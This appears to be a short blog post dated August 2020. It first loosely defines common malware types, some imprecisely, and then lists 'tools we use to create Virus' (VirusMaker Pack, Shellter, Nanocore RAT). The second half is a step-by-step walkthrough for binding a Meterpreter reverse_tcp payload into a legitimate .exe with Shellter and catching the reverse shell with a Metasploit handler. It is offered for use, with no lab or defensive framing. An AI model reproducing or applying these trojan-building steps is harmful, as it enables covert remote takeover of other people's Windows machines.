August 11, 2020



Malware is a harmful software intentionally designed just for damaging, a computer, server, client, or computer network. A wide range of malware exists, including computer viruses, worms, Trojan horses, ransomware, spyware, and adware.

Some Types of Virus and There description.

Virus: As discussed, the Virus is a specific type of malware by itself. It is a contagious piece of code that infects the other software on the host system and spreads itself once it is run. It is mostly known to spread when the software is shared between computers. This acts more like a parasite.

Worms: This type of malware will replicate itself and destroys information and files saved on the host PC. It works to eat up all the system operating files and data files on a drive.

Spyware: This type of malicious software, spies on you, tracks your internet activities. It helps the hacker in gathering information about the victim’s system, without the consent of the victim. This spyware’s presence is typically hidden from the host and it is very difficult to detect. Some spyware like keyloggers may be installed intentionally in an organization to monitor the activities of employees.

Adware: Adware is also known as advertising-supported software. It is software that renders advertisements for the purpose of generating revenue for its author. The advertisements are published on the screen presented to the user at the time of installation. Adware is programmed to examine which Internet sites, the user visits frequently and to present and feature-related advertisements. Not all adware has malicious intent, but it becomes a problem anyway because it harms computer performance and can be annoying.

Ransomware: Ransomware is an advanced type of malware that restricts access to the computer system until the user pays a fee.  Your screen might show a pop-up warning that you have been locked out of your computer and that you can access only after paying the cybercriminal. The cybercriminal demands a ransom to be paid in order for the restriction to be removed. The infamous Crypto locker is one type of ransomware.

Tools we use to create Virus.

  • VirusMaker Pack ultimate
  • Shellter in Kali Linux
  • Nanocore RAT
virus maker pack ultimate

Shellter in Kali Linux :
Installation Commands
[email protected]:~# apt-get install shellter

Now open Shelter and select (A) for auto configure.

press A

Paste your .exe file location with the name of the file.

  • And select 1 for payload
  • Set LHOST (local host)
  • Set LPORT (local port)
    After that our payload successfully bind with .exe file.
  • Start Listening to the attacker machine.
  • Select exploit/multi/handler
  • select payload windows/meterpreter/reverse_tcp
  • select LHOST and LPORT (same as above)
  • Exploit it

We got a reverse connection of window machine.


Recon force Team.

You may have missed